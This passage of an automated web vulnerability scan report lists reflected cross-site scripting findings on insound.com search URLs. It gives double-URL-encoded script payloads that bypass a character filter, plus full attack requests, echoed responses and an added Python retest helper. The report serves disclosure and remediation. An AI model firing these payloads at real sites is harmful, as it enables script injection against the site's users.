The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 6727d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e791b908fde5 was submitted in the REST URL parameter 3. This input was echoed as 6727d</title><script>alert(1)</script>791b908fde5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Les%20Sins6727d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e791b908fde5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=13i5tclhv7o7l6kdkq2cbq47q7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=360759513; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=467156798; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Les Sins6727d</title><script>alert(1)</script>791b908fde5</title>
...[SNIP]...
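A retest helper for findings of this kind, added here as an example and not the scanner's or insound.com's code. Given the attack request path and the body captured after following the redirect the report mentions, it decodes REST URL parameter 3 once (as the web server does) and twice (as the application evidently does), looks for the twice-decoded value echoed verbatim, and says which HTML context it landed in, so a fix can be confirmed from the same evidence the report presents. The bodies are constructed around the response snippets shown for 1.171 and 1.172 plus an assumed correctly encoded page; the split on `&from=` mirrors what the report's echoes show (the trailing `&from=47597` never appears in them) and is an observation, not documented behaviour.

```python
"""Retest helper for the reflected XSS findings in this report.

Added example, not the scanner's or insound.com's code. It reproduces
the scanner's reasoning from the evidence the report shows: decode REST
URL parameter 3 once (what Apache hands to the application) and twice
(what the application evidently echoes), look for the twice-decoded
value verbatim in the response body obtained after following the
redirect, and say which HTML context it landed in.
"""
import re
from html import escape
from urllib.parse import unquote

# Constant part of every payload in the report; the hex around it is the scanner's marker.
SCRIPT = '<script>alert(1)</script>'

# Request paths copied from findings 1.171 and 1.172.
REQ_ATTR = ('/search/query/Les%20Sinsd8f77%2522%253e%253cscript%253ealert%25281%2529'
            '%253c%252fscript%253ea1ef034ef7b&from=47597/')
REQ_TITLE = ('/search/query/Les%20Sins6727d%253c%252ftitle%253e%253cscript%253ealert'
             '%25281%2529%253c%252fscript%253e791b908fde5&from=47597/')

# Constructed bodies: the echoed lines are the report's snippets, the surrounding
# markup is minimal filler, and BODY_FIXED is how a correctly encoding page would look.
BODY_ATTR = ('<html><head><title>Les Sins</title></head><body>\n'
             '<input type="hidden" name="query" value="Les Sinsd8f77"><script>alert(1)</script>a1ef034ef7b" />\n'
             '</body></html>')
BODY_TITLE = ('<html><head>\n'
              '<title>Les Sins6727d</title><script>alert(1)</script>791b908fde5</title>\n'
              '</head><body></body></html>')
BODY_FIXED = ('<html><head>\n'
              '<title>Les Sins6727d&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;791b908fde5</title>\n'
              '</head><body></body></html>')


def rest_parameter(path: str, index: int) -> str:
    """The index-th non-empty path segment (1-based), as the report numbers them."""
    segments = [s for s in path.split('?', 1)[0].split('/') if s]
    return segments[index - 1]


def classify_context(body: str, needle: str) -> str:
    """Report where the echoed value sits, judged from the markup just before it."""
    pos = body.find(needle)
    if pos < 0:
        return 'not reflected'
    start = body.rfind('<', 0, pos)
    before_in_tag = body[start:pos] if start >= 0 else ''
    if before_in_tag.count('"') % 2 == 1:       # an unclosed double quote: inside an attribute
        return 'attribute value (double-quoted)'
    if re.fullmatch(r'<title[^>]*>[^<]*', before_in_tag, re.I):
        return 'text between TITLE tags'
    return 'HTML text'


def check_finding(request_path: str, body: str) -> dict:
    """Decode parameter 3 the way the server and the application do, then inspect the body."""
    segment = rest_parameter(request_path, 3)
    once = unquote(segment)                    # the web server's single decode
    # The application's second decode. The report's echoes stop before
    # '&from=47597', so the application splits the segment there (observed, not documented).
    value = unquote(once).split('&', 1)[0]
    return {
        'double_encoded': '%' in once,         # heuristic: only %25xx survives one decode
        'echoed_raw': value in body,
        'echoed_encoded': escape(value, quote=True) in body,
        'context': classify_context(body, value),
        'exploitable': SCRIPT in value and value in body,
    }


if __name__ == '__main__':
    for label, path, body in (('1.171', REQ_ATTR, BODY_ATTR),
                              ('1.172', REQ_TITLE, BODY_TITLE),
                              ('1.172 after fix', REQ_TITLE, BODY_FIXED)):
        print(label, check_finding(path, body))
```

Because the report marks every response as "(redirected)", the body handed to `check_finding` must be the one obtained after following that redirect; a client that does not follow it will see the value as "not reflected" and wrongly conclude the issue is fixed. A fixed page shows up as `echoed_encoded` true and `exploitable` false, as in the `BODY_FIXED` case.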

1.173. http://www.insound.com/search/query/Los%20Campesinos!&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Los%20Campesinos!&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 474d6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51236ecae5d was submitted in the REST URL parameter 3. This input was echoed as 474d6</title><script>alert(1)</script>51236ecae5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Los%20Campesinos!474d6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51236ecae5d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=qa5jkkp4264vt456nlf4241885; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:19 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=155318852; expires=Sun, 09-Jan-2011 02:38:19 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=244373154; expires=Sun, 09-Jan-2011 02:38:19 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Los Campesinos!474d6</title><script>alert(1)</script>51236ecae5d</title>
...[SNIP]...

1.174. http://www.insound.com/search/query/Los%20Campesinos!&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Los%20Campesinos!&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20920%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec978ed45671 was submitted in the REST URL parameter 3. This input was echoed as 20920"><script>alert(1)</script>c978ed45671 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Los%20Campesinos!20920%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec978ed45671&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=m74cch2lo1k01vb8ccurg957c5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=28252509; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=527380168; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Los Campesinos!20920"><script>alert(1)</script>c978ed45671" />
...[SNIP]...

1.175. http://www.insound.com/search/query/Lower%20Dens&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lower%20Dens&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 35836%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd6dde1bc23 was submitted in the REST URL parameter 3. This input was echoed as 35836</title><script>alert(1)</script>bd6dde1bc23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lower%20Dens35836%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd6dde1bc23&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mskdrdb1pbgri5g9nldt4h4lj7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=80305440; expires=Sun, 09-Jan-2011 02:37:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=404759631; expires=Sun, 09-Jan-2011 02:37:43 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Lower Dens35836</title><script>alert(1)</script>bd6dde1bc23</title>
...[SNIP]...

1.176. http://www.insound.com/search/query/Lower%20Dens&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lower%20Dens&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b52d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d323a4caa4 was submitted in the REST URL parameter 3. This input was echoed as 3b52d"><script>alert(1)</script>1d323a4caa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lower%20Dens3b52d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d323a4caa4&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7bp5berl6od3tnleuvcqt7nqi0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=465512889; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=194927980; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Lower Dens3b52d"><script>alert(1)</script>1d323a4caa4" />
...[SNIP]...

1.177. http://www.insound.com/search/query/Lunice&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lunice&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceb45%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb33609d160 was submitted in the REST URL parameter 3. This input was echoed as ceb45"><script>alert(1)</script>b33609d160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Luniceceb45%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb33609d160&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=eig795d91shfctb04jmid65vb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=98152616; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=369756760; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Luniceceb45"><script>alert(1)</script>b33609d160" />
...[SNIP]...

1.178. http://www.insound.com/search/query/Lunice&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lunice&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 39604%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4583cdc3959 was submitted in the REST URL parameter 3. This input was echoed as 39604</title><script>alert(1)</script>4583cdc3959 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lunice39604%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4583cdc3959&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=o1qgo5iruv8e4uoc3ktha9gt83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=21806490; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=172781745; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Lunice39604</title><script>alert(1)</script>4583cdc3959</title>
...[SNIP]...

1.179. http://www.insound.com/search/query/Lyrics%20Born&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lyrics%20Born&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b776bb7d33 was submitted in the REST URL parameter 3. This input was echoed as 855f5"><script>alert(1)</script>2b776bb7d33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lyrics%20Born855f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b776bb7d33&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=b77vhs2umg6hsqpq0kl6gnts31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=97711233; expires=Sun, 09-Jan-2011 02:41:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=75584412; expires=Sun, 09-Jan-2011 02:41:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Lyrics Born855f5"><script>alert(1)</script>2b776bb7d33" />
...[SNIP]...

1.180. http://www.insound.com/search/query/Lyrics%20Born&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lyrics%20Born&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 42357%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b98dfeecda was submitted in the REST URL parameter 3. This input was echoed as 42357</title><script>alert(1)</script>9b98dfeecda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lyrics%20Born42357%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b98dfeecda&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=607gdmfmt72ja0apv0iuf82n42; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=470110010; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=443254738; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Lyrics Born42357</title><script>alert(1)</script>9b98dfeecda</title>
...[SNIP]...

1.181. http://www.insound.com/search/query/Mark%20McGuire&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Mark%20McGuire&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b87ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26ee08b833f was submitted in the REST URL parameter 3. This input was echoed as b87ae"><script>alert(1)</script>26ee08b833f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Mark%20McGuireb87ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26ee08b833f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uu1g7th68g9a390q7hjs7t01i3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=417414704; expires=Sun, 09-Jan-2011 02:41:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=122527464; expires=Sun, 09-Jan-2011 02:41:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Mark McGuireb87ae"><script>alert(1)</script>26ee08b833f" />
...[SNIP]...

1.182. http://www.insound.com/search/query/Mark%20McGuire&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Mark%20McGuire&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 898ca%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e187d020e590 was submitted in the REST URL parameter 3. This input was echoed as 898ca</title><script>alert(1)</script>187d020e590 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Mark%20McGuire898ca%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e187d020e590&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:15 GMT
Server: Apache/2.2.3 (Red Hat)
